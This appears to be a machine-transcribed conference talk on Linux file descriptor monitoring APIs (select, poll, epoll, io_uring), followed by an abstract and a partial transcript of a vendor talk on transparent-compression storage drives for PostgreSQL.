zero if the file descriptor is not ready. And the return value to the system call is just the total number of bits set. And so this is how we can monitor multiple file descriptors with one system call. That's the select system call. Now select has some well-known design quirks, some limitations that make programming with it a little limited in some cases. First of all, this bitmap representation of the file descriptor number space is not very efficient because if we have a single file descriptor we want to monitor, but it happens to have a high number, then we need to provide a long bitmap with zeros all the way up to the file descriptor that we want to monitor. And then when the kernel processes the system call, it's going to have to scan that bitmap to find R1. It's going to have to start from the beginning of the bitmap. And so this is just going to waste CPU. It's maybe not a very good representation to use when you have just a few file descriptors, especially if the numbers are high. Another quirk is that POSIX select has a constant called fdsetsize. And that is the maximum file descriptor count that you can have in the bitmap. So what this means is that on Linux with Glib C, 1,024 is the limit for select. If your application has a file descriptor number that's higher than that, for example, you opened the file and you got file descriptor number 2,000, you would just simply not be able to use the Glib C select function in order to monitor that because it won't fit in the bitmap. So that's a pretty severe limitation if you want to be able to process many file descriptors. So for something that needs to scale and have a lot of file descriptors, select is basically out of the question. Okay, another API design aspect that we're going to be looking at as we go through these different system call APIs is how does the application associate an object with that file descriptor? A file descriptor number by itself is not necessarily useful to a program. If your program is doing many things at the same time and then you find out, okay, file descriptor 13 is now ready for reading, you might not know what that means. Which object is associated with that file descriptor? Was it an HTTPS session that we had going? Was it a pipe we were using to communicate with another process? We need some way of being able to connect the file descriptor with an application object so we can then easily handle the event for that object. Select tends to not do so well here. Usually select is used in a hard coded way where you see actual code that literally says if a particular file descriptor, for example, in our matrix client, if the TTY file descriptor is set, then go and process the TTY. And that is fine when you have a fixed number of file descriptors that you know at compile time. It doesn't work so well if you have, say, a server that's going to have many sessions and the number of file descriptors is dynamic. Now we need to figure out some way. So an obvious way is to just create a hash table but that is going to be a little bit inconvenient. We'll have to set up an extra data structure and it's going to be a hash table to go from a file descriptor number to our application object. So it doesn't have a built in way of doing this. We're going to see later on how other APIs make this easier. Okay, so let's move on from select. Poll is a POSIX API so it's widely available and it makes some of these shortcomings of select go away because it chooses a different representation for the file descriptors. Instead of using this bitmap that we had with select, it uses an array of struct poll FDs and so now we're no longer having to use a bit for every possible file descriptor number. Instead we just use a poll FD for each file descriptor that we actually want to monitor. We don't have zeros anymore. We just have the poll FDs that we are interested in. So that's an interesting approach. It has an input event mask. That's the poll FD events field where the application sets the events it cares about. For example, poll in or poll hop and then it has an R events field where the kernel writes the actual result event mask, the actual events that are ready. So that could be zero if there's no activity on this file descriptor or it could be a non-zero value if one of the bits that we were looking for is ready. It returns the event count, the total number of file descriptors that are actually available. So this is the poll API. Let's look at how it compares to select. So first of all, we're no longer limited to 1024 file descriptors which is a very important property if we want to be able to handle many, many connections at the same time. And the reason for not having this limitation is we're no longer using this bitmap and we no longer have that fixed FD set size. Okay. And in addition to that, we're now using a dense file descriptor list. We don't have all those zeros. So that's another improvement. Why is an improvement? It's an improvement because it means that the kernel, when processing the system call, no longer needs to scan all those zeros and skip through all of them. Instead, it just gets a useful list of the actual FDs that we want to monitor. Okay. So some CPU cycles are saved. Another interesting design decision is that there's that R events field. The kernel does not update our input event mask when we make the system call. Why does that matter? Why is that important? Well, it means you can set up the poll FD array once and then your application can loop and just keep calling poll as long as your set of file descriptors doesn't change. It can just keep calling poll and doesn't need to rebuild that poll FDs array every time it calls poll, which is a nice property. In select, we didn't have that because the kernel overwrote the FD sets that we passed in those bitmaps. We have to recreate the bitmaps every time from scratch. So this is an improvement that poll makes. That's nice. It saves CPU cycles. Finally, application object lookup is now simpler. We can just have a parallel array next to the poll FDs. We just have another array and each entry corresponds to the same index in the FDs array and we just store the object, the pointer to the object. And that way we can efficiently and easily look up the application object associated with this FD. So that's an improvement. The final thing I wanted to show in this slide is a common optimization that programs make. Since the system call told us how many FDs were ready, we can short circuit this for loop. We don't have to scan every poll FDs struct. Then we were monitoring a thousand poll FDs and only one of them was ready. As soon as we find that one, we will leave this for loop and we'll stop scanning. So that's a nice quality to have. We can save some CPU cycles by doing that. Great. So we've looked at select and we've looked at poll. Those are the most portable, they're POSIX, they're widely used, but they're relatively old and they do have some known scalability issues. So now let's move into the 21st century. So E-Poll was added to Linux in the 2000s and it changed the API. It made quite a big, it was quite a big departure from poll and select, which we're about to see. So E-Poll has an E-Poll control system call that we can invoke every time we want to add another or remove a file descriptor from the set of file descriptors that we're monitoring. And in fact, E-Poll itself is represented as a file. So you have an E-Poll file descriptor that you create with the E-Poll create one system call. And this allows you to actually have multiple sets of E-Poll in your application at the same time. If maybe you want to either have nested event loops or you just have different event loops and you want to keep them separate, you can do that. It's not global, it's not per process. Instead it's actually, you can have many instances and each one of them is one E-Poll file descriptor, which is an interesting aspect and we'll see more of that later. So how does it work? Well, we tell E-Poll control which file descriptor we want to monitor and we pass it an event mask similar to how we did it with the poll system call. We also have a data field where we can store an application specific value. We're going to get that value back when this file descriptor becomes ready. And so you can already imagine what that's going to do. It's going to make the application object look up even easier because the kernel will tell us which application object we wanted if we decide to store, for example, the pointer to the object in this data field. So that's something that's coming. All right, so we have been able to add file descriptors for monitoring, but how do we actually get events back? There is a system call called E-Poll P-weight. Here I've shown you the new Linux 5.11 version of the system call. This variant is called E-Poll P-weight 2 and the reason I wanted to show it to you is because it now finally has nanosecond timer resolution, which is excellent for applications that need high resolution timers. That was one of the few big limitations of E-Poll for a long time and now it's been solved. So that's awesome in the next 5.11. Okay, so when we call the system call, we give it an array of E-Poll events and we tell it how many events there are and the kernel will then go and collect the readiness information from the file descriptors and write them into this array and return the number of ready FDs, the number of events that it filled out. What's interesting here and what's different from poll is that we could be monitoring a thousand file descriptors and yet we can call this system call with just say 10 event array elements that the kernel will fill in. And the kernel is prepared to handle that. That's perfectly fine. And it makes a lot of sense because a lot of time your application will only ever have one or two or a few files that are ready at a given time in the event loop. And so it would have been wasteful to have to allocate, if we're monitoring a thousand file descriptors, it would be wasteful to allocate a thousand E-Poll events just in case all of them happen to be ready at the same time. So this is a bit of a gives you some flexibility, allows you to minimize resources if you want. And the kernel also has a built-in algorithm to make sure that if you do have a thousand file descriptors and you only read out the first 10 events, when you call it again, it remembers which ones you've already processed. And even if those files do become ready again, say even more data has arrived with the socket, it won't return them yet. It will make sure that you receive all the other pending events first. So this prevents starvation because imagine you had a loop and there was a lot of activity on the file descriptors and you were only ever harvesting a subset of them, then some of the high numbered file descriptors at the end of the array would just never be processed. So this is a useful feature to have. But that's not all. E-Poll has quite a few interesting things. So E-Poll has an edge triggered mode. If your application decides not to actually do something that will change that readiness state, so if your socket was readable, but then you decide you don't actually want to read it yet and you still want to call it E-Poll wait again, then you have a problem because that file is still readable. So you'll get an event back again saying, hey, the file is readable and you may want to defer that. So one efficient way of doing that is to use the edge triggered mode. What this does is it means that E-Poll will return events when they transition state, so going from not ready to ready instead of returning the level of the event, whether it's ready or not. That way you won't be bothered with lots of returns repeatedly for events that you haven't handled yet. There's also a one shot mode that you can enable. What this does is say you want to respond to an event on a file descriptor, but then you're going to wait for a while after you've handled that before you start monitoring again. With E-Poll system call design, you would actually have to use E-Poll control one more time in order to disable that file descriptor temporarily. Now with the one shot mode, you can get that for free because you're telling the kernel, hey, when this fires, when it triggers, please just disable it. And I'll bring it back later on when I'm ready. So it saves some of the system calls. It's a bit more efficient. The final mode that I really wanted to talk to you about is the E-Poll exclusive mode, which optimizes the way that multiple waiters who are all waiting for a file descriptor to become ready are handled. Let's look at that in detail. This is called the Thundering Heard problem. It's a well-known problem in computer science and in operating systems. The problem is if you have multiple processes or threads that are all waiting for work and the work becomes available, what do you do? If you wake all of them up and say, hey, there's work available, please go and grab it, then what will happen is that only one of them will be able to get the new work and the other ones, when they try to grab it, will find that there's no work available because there was only one item. And so that's very inefficient. On the other hand, you need to do this approach for load balancing because otherwise, if you decide who to give it to, if that worker is busy and isn't ready yet for the next piece of work, then your system will slow down and you'll have to wait for it. So this is called the Thundering Heard problem. Whenever we wake up, all of the workers wake up. They try to grab work. Only one of them makes it. Everyone else is just wasting CPU trying to grab work. So what the exclusive flag does is it tells the kernel that it's okay to wake up just a single worker. And that way, you avoid all that extra overhead. Let's look at that. So I ran a benchmark with E-Poll, exclusive on and off. And what we're seeing here is we're seeing the number of messages that were received and sent. And this is divided by the amount of CPU time that was spent. And so we really see the CPU efficiency here. We see how many messages were we able to process per unit of CPU time. As the number of threads goes up on the x-axis, you can see that without the E-Poll exclusive flag, the scalability is poor, the performance drops as we add more threads because they're all going to wake up, try to fetch some work, and it turns out there's nothing to do. And they go back to sleep again and we've wasted CPU. That's why the efficiency is so poor. And we can see how well the E-Poll exclusive flag works when we have a lot of threads. Great. So that was the Thundering Heard. Another big change, a big departure that E-Poll made in its API design is it is a stateful API. It is not a stateless API. Select and pull are stateless. Each time we call them, the kernel starts from scratch. It doesn't know anything about the file descriptors that we're going to be monitoring. And when we're done, it doesn't care anymore. It forgets about it. And we start from scratch every time. So each time the kernel is going to have to set up the monitoring on the whole set of file descriptors only to collect an event for maybe one or two that are actually ready now and return that back. So that's wasteful. And what E-Poll does is because we've created this E-Poll file descriptor using E-Poll create1, it can actually store which file descriptors are being monitored. And when you make the E-Poll P-weight call, what it's doing is it's not setting up the monitoring. That's already been set up. At that point, it's just collecting the events that have occurred. So that's much, much more efficient. So now the kernel doesn't need to loop over all your FDs, set up the monitoring, and so on. Now it just needs to look at which events have already occurred. So this is an improvement that E-Poll makes just in terms of the fundamental design. And the trick here is that it's a stateful API. Now taking this a bit further, how does the efficiency of this look? This big O notation here I'm using is just to show you, does user space or does the kernel have to loop over the data that we're processing many times? And in the case of select, the kernel actually has to loop over those bitmaps all the way up to the maximum file descriptor number. So that's very inefficient. The pathological case there is say we have file descriptor 1000 and it's the only FD we're monitoring. We still need to create a big bitmap with lots and lots of zeros all the way up to the thousands one. And so that way CPU cycles. Now poll does better. The poll system call does better. It only loops over the actual total number of FDs that we're monitoring. So it doesn't care if the file descriptor number is 1000 or if it's one, the efficiency just hasn't changed there, but it still needs to loop over all of them. So if we want to monitor 1000 FDs, then each poll call is going to have to process all of them. Finally, let's get back to E-Poll. E-Poll is an improvement here. E-Poll only needs to process those that are actually ready. And so you can see that this is a fundamental improvement in terms of efficiency. We only need to see the FDs that are ready. And in user space, the E-Poll events that are returned from poll weight are really just the FDs that we're about to process. So this is great. But that was the 2000s. That was E-Poll. Things have moved on since then. So in the past few years, Linux has gotten the IOU ring system calls and a lot of system calls have now been added to IOU ring so that it can do a lot of functionality asynchronously, which means that there is a submission queue where user space can add requests. And there is a completion queue where user space gets the finished request that the kernel has finished processing. And it allows user space to queue up one or more requests to the kernel. The kernel will then handle them, and the results will be written back to the completion queue when they're done. The system call here is IOU ring enter. And we basically just tell the kernel how many new requests are in the submission queue that we want to process. And we tell it how many requests we want to wait for. Do we want to wait for one request? That could be the next request, whatever that is. Or do you want to wait for 10 requests? Or maybe for no request if we don't actually want to wait at all. So that's how the system call works. There's no timeout here, which you might have noticed compared to all of our other system calls, but we're going to see how that works in a second. OK, so now I mentioned that the submission queue takes these requests. Well, there's lots of request types. Here are the operations that are relevant to file descriptor monitoring. And there are many more that you can find in the documentation that aren't going to be relevant for file descriptor monitoring. Poll add allows us to do a one-shot file descriptor monitoring operation. We can add an FD. We can tell it which events we care about. And this request will complete when the file descriptor has some activity. If we change our mind, if we decide, OK, we don't want to monitor that file descriptor anymore, then we can use the poll remove request type to cancel it. An interesting one, an interesting request type, is the ePollControlRequestType. What this allows us to do is it allows us to invoke the ePollControlSystemCall functionality using IOU ring. So why would we want to do that? We can do it in a way that avoids system calls. So the bottleneck with the ePollControlDesign is that that system call only operates on a single file descriptor. It adds a single file descriptor. It removes a file descriptor or it modifies an existing one. But you can't use it to, say, monitor 1,000 file descriptors in a single system call. And if you have a lot of file descriptors that you're changing frequently, then, of course, that system call overhead is going to be relevant. When using IOU ring, you can actually queue up all of these requests and then do a single IOU ring enter system call to process them. See the trick with IOU ring is that the submission queue and the completion queue are M mapped into user space memory. So the user space processes memory space has the submission completion queues. And that's why we can access them and add things and process completions without doing system calls. So that's an interesting use here. And if you remember back when I said ePoll can nest because that file descriptor itself supports polling, we could use that ePoll file descriptor within IOU ring. For example, we could use poll add on the ePoll file descriptor. The final thing I wanted to mention is timeouts since the IOU ring enter system call doesn't have a timeout argument, the way to do it is to add a timeout request to the submission queue. And that way, we'll be able to stop waiting if there is no activity when our timeout expires. OK, so that was a lot. It's a very different model. And here is an example using the libUring user space library. What's happening here is that we are preparing one file descriptor for read monitoring. We're using poll in flag. So we use IOU ring getSQE to get the next available submission queue entry. We then set the file descriptor number on it and the poll in flag. And then we do the IOU ring SQE set data call. And what that does is it associates, it stores our object pointer, our application object, or any 64-bit value that we want. It stores that with the SQE so that when this completes, we'll get that value back and we can look up our application object. OK, great. So we've added the request, but now we're going to tell the kernel about it and we're going to wait for the completion. And we can do that using the single IOU ring submit and wait library call. And when it returns, we know something has happened. And then we can just loop over the completion queue with the IOU ring for each CQE loop. And then our application can handle the completion result. And that user data field that you see there is going to be that object value that we stashed in the submission queue. And then finally, we need to call IOU ring CQE advanced just to tell the kernel that we have now processed those completion queue entries and they can be reused. So that's programming with IOU ring. What are the characteristics of IOU ring compared to EpoL? So first of all, we talked about how EpoL control only handles one FD at a time. Whereas with IOU ring, we can handle many FDs at a time. We can add many FDs, we can remove many FDs in a single system call. So that's an advantage right there. The system call also combines both submission and completion into a single system call. So it further minimizes it. Whereas with EpoL, we had to do EpoL control and EpoL wait. With IOU ring, we only need to do IOU ring enter. That's the only system call. So again, this is a little performance boost if this is in the inner loop of your application or trying to minimize CPU cycles and minimize latency. Another thing that's interesting about IOU ring is that it supports busy waiting, both in the kernel and in user space. And what that means is that since that completion queue is M-mapped into user space, our user space process can actually just peek at the completion queue memory and can see when requests become ready. It doesn't need to make a system call in order to ask the kernel if requests have completed. If your application is either CPU intensive or if it already has a busy wait loop, you can integrate into that. And you can easily and cheaply check any IOU ring events, which means you can do file descriptor monitoring from within a busy wait loop in your application. On the kernel side, it's also possible to do busy waiting because IOU ring supports kernel polling threads, but we're not going to get too into that. There are also other features that IOU ring has. I think we've only really scratched the surface here. It's very powerful. It has a concept of linked requests. It has some optimizations for pre-registering file descriptors and buffers so that the kernel doesn't need to keep looking them up. So that saves some CPU cycles. And there's a lot more. So it's a really interesting API. Now I just mentioned busy waiting. And so I want to go back and mention that if you're using select poll and ePoll, they also have some busy waiting support. It's limited, but in Linux, you can use the net core busy poll at sysctl in order to set the number of microseconds that these system calls should busy wait instead of idling the CPU. Now, this is used in applications where you have dedicated CPU resources and you want to minimize latency, idling the CPU, putting it into a low power state, and then when a packet comes in having to wake it up again and having to schedule and get back to what we were doing adds latency. And so some applications can use this with select poll and ePoll. So I just wanted to mention that since we were talking about busy waiting for IOU ring. By the way, this is only available for network sockets in Linux. So it's a network subsystem thing. And if you're using other types of file descriptors, then it won't work with them. Okay, so we've looked at the APIs, but we're not really done yet because we talked about threads and some of the pros and cons of threads. Then we looked at file descriptor monitoring. There's actually another approach that we can take aside from threads or file descriptor monitoring. With IOU ring, we could actually just do the IOU operations asynchronously. So we could just tell the kernel using IOU ring to do a read. And it would complete the request when that read is finished. And if the socket is not ready or the pipe is not ready, then that request would just be waiting. But in the meantime, our user space thread could make progress. So we can solve the same problem that we had with our matrix chat client of monitoring and doing stuff in multiple FDs. We can actually solve that using asynchronous IOU instead. Why might that be an interesting idea? Well, because this way, we don't need to attempt to read, find out the socket has no data available, then add it to the set of FDs to monitor, go into the kernel, wait to be woken up when something happens, and then try reading again. We can eliminate all of that kind of housekeeping work, all of that back and forth, and just do a single asynchronous read. So it's potentially an interesting approach. One of the issues with it, though, is that it's something more for new applications. It's hard to retrofit this into existing applications, especially if you remember that I mentioned that GTK and QT and so on are based on file descriptor monitoring. Using something like this universally would mean basically breaking the APIs and changing the way that applications use file descriptors. They would have to start using asynchronous operations instead of monitoring file descriptors. And so this is kind of hard to do with existing code. I've written a blog post about it that goes into more details about the performance advantages that we could get by doing this. And if you're writing new code, you might consider trying this out and seeing how it works. Okay. We should just briefly mention the other APIs that we don't have time to cover in detail. First of all, there is CIGIO, which is an old mechanism, and it's a signal-based mechanism where you can mark a file descriptor as, please send me CIGIO signals when the file descriptor is ready. But it's rarely used, probably because programming with signals is tricky. It's also not a very expressive interface. It's hard to use, and therefore I've never seen it used. There's Linux AIO, which is similar to IOU ring, but is a precursor to it. It has a subset of the functionality, and so that's why I didn't go into that one, but that's available too. Okay. And then finally, let's move on to some performance data and some benchmarks. I have posted a code for a benchmark. What it does is it receives data on a random file descriptor and then just sends the data back. So, it doesn't change the benchmark. It doesn't change the set of file descriptors that are monitored during the benchmark. It only sets it up once. So this may not be representative of your application, but it does show the raw performance of just the file descriptor monitoring itself, just the waiting. Okay. So let's look at the scalability of all the APIs we've talked about. We see they fall into three classes, right? These curves fall into three groups. The bottom group is select and pull, which isn't a big surprise because we talked a lot about their limitations and how they're inefficient and how they don't scale. So we see here that they really don't do well compared to the others. Although note that the Y axis on this graph doesn't start at zero. So it's not as bad as it looks on the graph, but I wanted to zoom in so we can see these details here. In the middle, we have threads. I wanted to make sure we compare this with an application that just has one thread per IOTask. So we don't lose sight of what programming with threads is like. And you can see here that the performance is just always lower than the E-Poll and IOUring performance at the top when we use threads. That's the blue line in the middle. What's interesting is that IOUring using AIO, so not doing file descriptor monitoring, but doing asynchronous reads and writes, is similar to threads in this benchmark. Now I have to add a caveat. I think that there's a lot more that can be done, whether that's tweaking the benchmark itself to make use of IOUring more efficiently. It's not using busy waiting or any stuff like that. Or extending the IOUring implementation in the kernel to make it more favorable for this type of usage. So I think it could go a lot higher, but that's where it is. And it kind of makes sense because IOUring internally does have a thread pool in the kernel. So eventually it does end up in a thread. And so it kind of makes sense that it's similar to using threads. Okay. And finally at the top, the fastest ones, very similar performance was IOUring doing file descriptor monitoring and E-Poll. So they're both excellent. And you can see actually that they scale very well with the number of file descriptors. They didn't, there wasn't a steep curve. They were very flat. So that's nice to see. And IOUring is the one that is a little bit more flexible, as I mentioned. It has all these other features that you might find useful in your application, whereas E-Poll is just dedicated to file descriptor monitoring. That's the difference between those approaches. I just want to also show the CPU efficiency of this. So again, here we're dividing by the unit of CPU time consumed in order to see a slightly different picture here. We're seeing that threads actually consumes a lot of CPU per request compared to the event-driven approaches, which makes some sense because when we're switching threads, we have higher overhead. So the scheduler, maybe the cache and so on, and the call stack all need to be changed and cleaned out, especially with security mitigations and so on. So yeah. Finally, summary. On this slide, I just wanted to show you which of these APIs are the portable ones. I think we saw with performance that really if you are able to use an event loop library that supports a Linux specific API or you have the time to implement it yourself, that's worth it for performance. Thundering Heard is solved by E-Poll and IOU ring. So if you have those concerns, it's best to use those APIs. And then finally, E-Poll is one that's popular today in high performance applications. I think that IOU ring might be more popular in the future as people use some of the other functionality together with file descriptor monitoring. Okay. Thank you very much. We can move on to questions.
|
File descriptor monitoring is at the core of event-driven applications from graphical applications to web servers. Over the history of Linux, a number of system calls APIs have been introduced to improve upon the performance, features, and interface design. Developers may ask themselves which API they should use and how they differ. This talk covers select(2), poll(2), epoll(7), as well as the more recent Linux AIO and io_uring APIs. We will look at the classic scalability challenges with these APIs as well as the latest shared kernel memory ring and polling approaches. An understanding of the evolution of file descriptor monitoring in Linux exposes API design topics that have relevance even if you don't need to implement an event loop in your application.
|
10.5446/13951 (DOI)
|
It's really my great honor to have this opportunity to share our experience on how post-grace can greatly benefit from the emerging computational storage on the market. First, a very brief introduction to computational storage. As CMOS technology scaling is reaching to its limit, the computing infrastructure is transitioning from traditional CPU-only homogeneous computing towards domain-specific heterogeneous computing, where certain computation tasks migrate from CPU to other computing engines, including the standalone PCIe accelerators, smart network card that offloads network processing from CPU, and computational storage drives that offload tasks such as data compression and encryption from CPU altogether complement with CPU to form a truly heterogeneous computing infrastructure. In the heterogeneous computing landscape, regarding the commercialization of computational storage, data pass transparent compression apparently is the first low-high-in-fruit to pick. Its basic idea is very simple. Compression is done in hardware on the IO pass, completely transparent to the OS and the user applications. Our current product uses a single FPGA to handle both flash control and for per 4K bytes, Zlib compression. We implement flash translation layer in our kernel space driver that exposes the storage drive as a standard block device to the Linux block layer. Now, let's see how such a storage drive could benefit Postgrease. We know that Postgrease does not compress table data on its own, unless the record size is large, for example, like a 2K byte. As a result, end users have to rely on the underlying storage hierarchy in order to bring data compression into the picture. Normally the first option is to run Postgrease on file systems that support native transparent compression such as ZFS and BTRFS. Internally, those file systems carry out block compression and stores each compressed block over one or multiple 4K byte sectors on the storage device. The 4K byte alignment constraint causes the storage space waste and degrades the compression ratio. In order to improve the compression ratio, we could increase the compression block size, for example, from 8K byte to 32K byte. When the 8K byte Postgrease database page size, a larger compression block size will result in a higher rate and write amplification at the file system level, leading to a larger database performance degradation. To improve the compression ratio, another option is to make those file systems apply much more powerful compression libraries. For example, instead of LZ4, we could apply Z-standard or Z-lib to improve the compression ratio, of course, at the cost of CPU overhead. This will also lead to a larger database performance degradation. So in addition to such inherent compression ratio versus performance tradeoff, ZFS and the BTRFS in general are far less popular compared with journaling file systems like EXT4 and XFS that, however, do not support transparent compression at all. So to support data compression, another option is to use the block layer with built-in transparent compression, such as the VDO module in the latest Linux kernel. Operating underneath the file system, such block layer modules can transparently compress each 4K byte block and packs multiple compressed blocks into one 4K byte sector. Compared with the file system level compression, the compression ratio of such block layer modules could be even lower or much lower. So to improve this compression ratio, the only option is to apply more powerful compression libraries, which will, of course, lead to a larger performance degradation. So up to now, we can see that regardless of file system level or block layer transparent compression, the system is always subject to a strict tradeoff between the storage cost saving and the database performance degradation. Moreover, due to the inherent implementation constraint, neither file system nor a block layer could achieve high data compression ratio. So as a result, end users typically just forget about the data compression and just run post-grace on normal storage hierarchy, leaving those highly compressible data completely uncompressed on storage devices. Seems like there is nothing we can do here. Actually, this is where the hardware community can come to help. How about let us make each storage device capable of carrying out hardware-based compression, being completely transparent to the software stack? This would bring data compression back to the picture without suffering from the storage cost versus database performance tradeoff. Such storage devices are called computational storage drive with data pass transparent compression. So this cartoon further illustrates its difference from current practice. On the left-hand side is the current practice where we use either CPU or accelerator to handle data compression and deploy normal NVMe SSD. The right-hand side shows the computational storage drive with data pass transparent compression. Here a single FPGA combines the functionality of a flash controller with the hardware compression and the decompression engine. We handle all the FPGA design and programming to enable a very simple and convenient plug and play solution for end users. By combining the SSD and the compression functions altogether into a single chip, this storage drive, phrase up, hosts at CPU cycles, minimizes the data movement and enables the compression throughput to scale with the storage capacity. So in the remainder of this talk, I will discuss the basics of such a storage hardware and its application to Postgres. From the functionality perspective, computational storage drive with data pass compression is logically equivalent to the block layer transparent compression as we just discussed earlier. Both of them compress each 4K byte user data being transparent from file systems and the user applications. However, from the implementation perspective, our computational storage drive integrates hardware-based Zlib compression which can achieve higher compression ratio at zero CPU cost. Moreover, it tightly places all the compressed blocks in flash memory without any storage space waste, which can further boost the overall data compression ratio. So this figure compares the compression ratio of our computational storage drive with several mainstream compression libraries, including LZ4, the standard and the Zlib. We use the Canterbury corpus file as the test bench and set the compression block size at 8K byte for all the compression libraries and align each compressed block to 4K byte boundary. The results clearly show that our drive could achieve the best compression ratio even compared with the very powerful compression libraries like Zlib and Zlib. So this slide shows the basic FIO testing on our drive and a competing high-end NVMe drive. Both are 3.2 terabytes. FIO generates heavy IO workloads across the entire 3.2 terabytes storage space. The three figures here show the random IOPS when each IO request is either 4K byte, 8K byte or 16K byte. In each figure, the horizontal axis is the read percentage in the total IO workload. As the workload changes from read-only to write-only, the IOPS of the normal NVMe drive significantly drops because of their internal garbage collection overhead. In comparison, in our drive, the built-in transparent compression can on the fly reduce the data traffic, leading to much less internal garbage collection activity. As a result, not surprisingly, our drive with built-in transparent compression can achieve much higher IOPS as shown in the figures. So now let's see how Postgrease performs when running on the drives with built-in transparent compression. So here we run five different CIS bench workloads on both our drive and the competing high-end NVMe drive. We keep all the Postgrease parameters at their default settings, and the dataset size is about 2 terabytes. Even though CIS bench generates data randomly with relatively low compressibility, the results still show that our drive can transparently compress the 2 terabyte dataset to less than 800 gigabytes, representing about 60% storage cost reduction. This figure compares the TPS of the five CIS bench workloads. For write-intensive workloads like update non-index and update index, both our drive and the competing NVMe drive have the same TPS performance. So at the first glance, this seems to contradict with the FIO random IOPS comparison we just showed previously. Here our drive can achieve so much better random IOPS under FIO testing, but it does not reflect on the Postgrease TPS comparison. The main reason is that the dataset size and the write IO intensity here are not large enough to trigger the garbage collection inside the storage drive. Therefore, both drives do not experience the internal garbage collection, and as a result, they tend to have similar performance under write-intensive workloads. Meanwhile, we can see that the write-intensive workloads have noticeably better TPS performance on our drive. So where the gain comes from? The reason is that by compressing each page, it can reduce the probability that different read requests access the same flash memory chip. This leads to a higher page read throughput, and hence the higher TPS under the read-intensive workloads. So beyond such straightforward use, we can go one step further to make Postgrease take better advantage of the storage drive with built-in transparent compression. First, we all know that Postgrease uses a parameter called the FIO factor to control the amount of space reserved in each AK-bite page for future updates. The value of the FIO factor directly determines the trade-off between the database performance and the storage cost. So if we reduce the FIO factor to leave more space for future updates in each page, the database performance will improve, especially under those write-intensive workloads. But meanwhile, the storage cost will accordingly increase. As a result, Postgrease by default just sets the FIO factor as 100 or 100%. That is, do not purposely reserve any space within each page for future updates. This is just in order to minimize the storage cost. Interestingly, once Postgrease runs on storage drive with transparent compression, the storage overhead caused by the reserved space will largely disappear because Postgrease initialized the reserved space as all-zero, and the transparent compression can highly compress the all-zero segments. This naturally enables Postgrease more aggressively set the FIO factor without sacrificing the physical storage space. To illustrate this, let the blue and the black dots represent the operating points where when using our drive and the normal NVMe drive, with the default FIO factor of 100%, they have pretty much the same performance, and our drive can reduce the physical storage cost by half through transparent compression. But once we reduce the FIO factor to, let's say, 50%, under normal drive, the storage cost directly doubles, and meanwhile, the performance improves, the very clear trade-off between the performance and the storage cost. And under our drive with transparent compression, we can expect pretty much the same performance improvement, but meanwhile, the storage cost remains almost unchanged. So we further carried out this bench TPCC benchmarking. Here we considered two different data set sizes, 740 GB and a 1.4 TB. The results show that as we reduce the FIO factor from 100 to 75, the TPS performance can improve by about 33%. Under normal NVMe drive, the physical storage cost of space usage jumps from 740 GB to 905 GB, or from 1.4 GB to 1.7 TB. In comparison, under our drive with built-in transparent compression, we can see the same 33% TPS performance improvement, and meanwhile, the physical storage space only slightly increases from 178 GB to 189 GB, or from 342 GB to 365 GB. So this study clearly shows that by configuring the FIO factor parameter, POS grids can very nicely take much better advantage of transparent compression to further improve the TPS performance without compromising the physical storage cost. Moreover, we also started the impact on write amplification. We all know that the non-flash memory suffers from limited write and read-cycling endurance, which becomes a bigger and bigger issue with the technology scaling, especially for the upcoming QLC non-flash memory technology that stores 4 bits in one memory cell. So as a result, it is more and more important to reduce the application-level write amplification. Meanwhile, the B-Tree data structure underlying the POS grids is very known for its large write amplification for workloads with relatively small record size. So to evaluate how computational storage drive with built-in transparent compression could help to reduce the write amplification for POS grids, we further carried out experiments using the three write intensive C-SPANCH OLTP workloads. We ran the testing on two different file systems, EXT4 and the BTR FS. So this figure shows the write amplification results under the three different C-SPANCH workloads, update non-index, update index, and write only. We also considered two different scenarios with different number of client threads, that is eight clients and 32 clients. For each case, we can clearly see that when using our computational storage drive, CST-2000, the overall system write amplification can reduce by three times, which is consistent over different workloads and different file systems. So to materialize the storage cost saving for any users, our drive can expose a logical storage capacity that is much larger than the true physical storage capacity, for example, by two times, four times, or even more. Of course, due to the runtime data compression ratio variation, users must be able to monitor the physical storage space usage and accordingly manage the data storage. In this context, we provide two levels of support. First, we provide IO control and the CISFS API for users to query the runtime physical storage space usage. This can be easily integrated into existing storage space management tool set. To make things even simpler, we also provide a space balancer that runs as a background daemon to ensure that file system will never run out of physical storage space before using up the total logical storage space. So here, let's use a cartoon to explain how the space balancer works. So given a drive with a 3.2 terabyte raw physical storage capacity, suppose the user estimates her data compression ratio is about 2 to 1. So she could just format the drive as a 6.4 terabyte. That is, the file system sees the total 6.4 terabyte logical storage space, even though there is only 3.2 terabyte physical storage space inside the drive. Suppose the user first writes, let's say, 1 terabyte data into the drive that are internally compressed to 0.5 terabyte. So this leaves 5.4 terabyte free logical storage space at the file system level and 2.7 terabyte free physical storage space inside the drive, still satisfying the projected 2 to 1 compression ratio. So the file space balancer does not do anything here. But if the user writes another 1 terabyte data that are totally incompressible, then we have only 4.4 terabyte free logical storage space at the file system level. There's only 1.7 terabyte free physical storage space inside the drive, which does not meet the projected 2 to 1 compression ratio. This means the file system faces a risk that the physical storage space may run out before it uses up all the logical storage space. So at this time, the background file space balancer will automatically kick in and create a virtual 1 terabyte balancer file on the file system. This virtual balancer file does not consume any physical storage space. Then as a file system level, we see only 3.4 terabyte free logical storage space and inside the drive, there is a 1.7 terabyte free physical storage space so that we can again meet the projected 2 to 1 compression ratio. By using the file space balancer, users do not need to change anything in their existing storage monitoring and management system. So up to now, we have been mainly focusing on our computational storage drive that can perform hardware-based transparent compression. Actually we are not the only company in this area, and storage hardware with built-in transparent compression is now quickly becoming pervasive. Most all-flash arrays support built-in transparent compression. Storage drives with built-in transparent compression are being commercialized also by C gate, and many similar products are coming very soon. Moreover, cloud vendors already started to deploy hardware compression capability. This will make cloud-native transparent compression readily available in the near future. So now it may be the right time for the database community to study how relational database like Postgrease can take full advantage of such a new storage hardware. So in the following, I will present two simple ideas along this direction and would love to explore deeper engagement with the Postgrease community. So the first idea is to apply a dual in-memory versus un-storage-page format in Postgrease, which can further improve the data compression ratio on storage hardware with built-in transparent compression. Motivated by the column store, the basic idea here is very simple. When a page stays in the database cache memory, we keep its conventional role-based format. When flashing a page from cache memory to storage, the database on the fly converts the page to a column-based format and applies certain CPU light transformation on each column to improve the data compressibility. To demonstrate this simple concept, we use InnoDB as a test vehicle, and the results show that we could improve the data compression ratio by 40% at a very minimal performance impact. It would be very interesting to see how this idea could be integrated into Postgrease storage engine. The second idea is to reduce the write IO traffic caused by the full page write in 